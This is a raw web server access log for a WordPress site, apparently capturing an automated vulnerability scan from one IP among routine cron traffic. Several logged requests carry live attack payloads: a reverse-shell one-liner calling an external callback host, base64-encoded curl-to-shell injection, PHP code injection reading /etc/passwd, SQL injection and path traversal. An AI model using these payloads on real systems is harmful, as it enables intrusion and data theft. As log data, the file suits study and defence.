165.232.54.158 - - [13/Jan/2026:15:35:15 +0800] "POST /account HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:35:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768289718.4558300971984863281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:35:15 +0800] "POST /account HTTP/1.1" 200 10779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:35:32 +0800] "GET /__ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:38:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768289900.7541010379791259765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:38:17 +0800] "POST /photo-gallery/api/album/tree_lists/ HTTP/1.1" 404 10860 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:38:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768289907.3241069316864013671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:38:24 +0800] "POST /photo-gallery/api/photo/search/ HTTP/1.1" 404 10860 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:38:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768289911.1916189193725585937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:38:29 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:41:42 +0800] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:15:41:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768290110.3547949790954589843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:41:48 +0800] "POST /?wordfence_syncAttackData=1768290108.6486 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:41:46 +0800] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/38Btk66FuMvmIHogCTjoZCns3eo.jsp HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:15:42:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768290173.3286719322204589843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
85.186.88.250 - - [13/Jan/2026:15:42:49 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0"
103.4.122.14 - - [13/Jan/2026:15:43:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768290198.5077610015869140625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:43:15 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:15:43:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768290207.4238541126251220703125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:43:24 +0800] "POST /upload HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [13/Jan/2026:15:44:29 +0800] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 403 199 "-" "Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:45:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768290312.0074100494384765625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:45:08 +0800] "POST /web/google_analytics.php HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:15:46:26 +0800] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 403 199 "https://nutritaste.com.au" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:46:34 +0800] "GET /qsr_server/device/getThumbnail?sourceUri=\\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//d5iu610i9qj8svou82p01mnwba8xd8ikx.oast.fun%2b>/tmp/f%253b\\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:46:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768290398.1418340206146240234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:46:36 +0800] "POST /?wordfence_syncAttackData=1768290396.551 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:46:34 +0800] "POST /installer-backup.php HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:15:47:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768290442.6662600040435791015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:47:19 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:47:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768290449.2754189968109130859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:47:26 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:47:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768290456.3543379306793212890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:47:33 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/109.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:47:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768290462.2843959331512451171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:47:39 +0800] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:47:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768290469.2031989097595214843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:47:46 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:47:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768290475.3106598854064941406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:47:52 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:15:47:58 +0800] "GET /__ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:15:49:22 +0800] "POST /openmrs/ws/rest/v1/xxxxxx HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:15:49:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768290565.7764089107513427734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:49:22 +0800] "POST /ws/rest/v1/xxxxxx HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:15:50:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768290600.8233621120452880859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:49:57 +0800] "POST /php/change_config.php HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/111.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:50:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768290607.3719420433044433593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:50:04 +0800] "POST /php/change_config.php HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:15:50:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768290613.2949550151824951171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:50:10 +0800] "GET /php/setup.php?step=4&PDF2SWF_PATH=echo+Y3VybCBvYXN0LnBybw==+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:50:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768290619.3148720264434814453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:50:16 +0800] "GET /php/config/output.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:51:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768290684.7173950672149658203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:51:21 +0800] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 404 10890 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:15:52:25 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:52:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768290765.7277910709381103515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:52:42 +0800] "POST /public/login.htm?file=/api/addusers.htm HTTP/1.1" 404 10866 "https://nutritaste.com.au" "Mozilla/5.0 (Fedora; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [13/Jan/2026:15:52:57 +0800] "GET / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:53:01 +0800] "GET / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:53:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768290782.3516690731048583984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:52:59 +0800] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 10966 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:53:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768290788.2926840782165527343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:53:05 +0800] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 10965 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:15:53:20 +0800] "GET /type.php?template=tag_(){};echo(md5(999999999));{//../rss HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Debian; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:15:53:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768290806.8238499164581298828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:53:25 +0800] "POST /?wordfence_syncAttackData=1768290805.3784 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:53:23 +0800] "GET /data/cache_template/rss.tpl.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [13/Jan/2026:15:56:27 +0800] "POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:58:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768291090.1412279605865478515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:58:06 +0800] "POST /XMLCHART HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:01:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768291284.6791839599609375000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:01:21 +0800] "POST /soap.cgi?service=whatever-control;curl HTTP/1.1" 404 52593 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:01:25 +0800] "POST /php/upload.php HTTP/1.1" 403 6627 "https://nutritaste.com.au" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:01:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768291292.6695089340209960937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:01:31 +0800] "POST /?wordfence_syncAttackData=1768291291.234 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:01:29 +0800] "GET /Uploads/38BtkCqgHXGPEy5VwT6TNMPVjWW.php7 HTTP/1.1" 404 10887 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:01:59 +0800] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:16:02:34 +0800] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:02:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768291379.6090910434722900390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:02:56 +0800] "POST /json HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:03:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768291386.2497699260711669921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:03 +0800] "POST /api/json HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:03:11 +0800] "POST /install/install.php?step=4 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
103.4.122.14 - - [13/Jan/2026:16:03:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768291393.1954510211944580078125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:10 +0800] "POST /json HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:03:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768291397.1877539157867431640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:14 +0800] "GET /install/includes/configure.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:03:16 +0800] "POST /api/json HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:03:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768291405.3189969062805175781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:22 +0800] "POST /parse HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14"
103.4.122.14 - - [13/Jan/2026:16:03:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768291411.2667798995971679687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:28 +0800] "POST /deserialize HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:03:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768291417.3799169063568115234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:34 +0800] "POST /json HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
103.4.122.14 - - [13/Jan/2026:16:03:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768291423.2564311027526855468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:40 +0800] "POST /api/json HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:16:03:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768291429.1857309341430664062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:46 +0800] "POST /parse HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [13/Jan/2026:16:03:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768291435.2268409729003906250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:52 +0800] "POST /deserialize HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:16:04:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768291441.2262809276580810546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:03:58 +0800] "POST /json HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:04:48 +0800] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:04:52 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:16:06:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768291586.3862559795379638671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:06:22 +0800] "POST /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:06:24 +0800] "POST /?wordfence_syncAttackData=1768291584.5479 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:06:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768291589.4977450370788574218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:06:27 +0800] "GET /wp-login.php HTTP/1.1" 200 3205 "https://nutritaste.com.au/login.php" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:08:04 +0800] "GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1" 404 196 "-" "-"
103.4.122.14 - - [13/Jan/2026:16:08:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768291723.7736530303955078125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:08:40 +0800] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:08:47 +0800] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:16:08:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768291729.7011439800262451171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:16:08:48 +0800] "POST /?wordfence_syncAttackData=1768291728.1897 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:08:46 +0800] "POST /scripts/ajaxPortal.lua HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:16:09:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768291740.3644120693206787109375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:08:57 +0800] "POST /scripts/ajaxPortal.lua HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:09:48 +0800] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 302 - "nutritaste.com.au/user/register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
165.232.54.158 - - [13/Jan/2026:16:12:32 +0800] "GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 403 199 "-" "-"
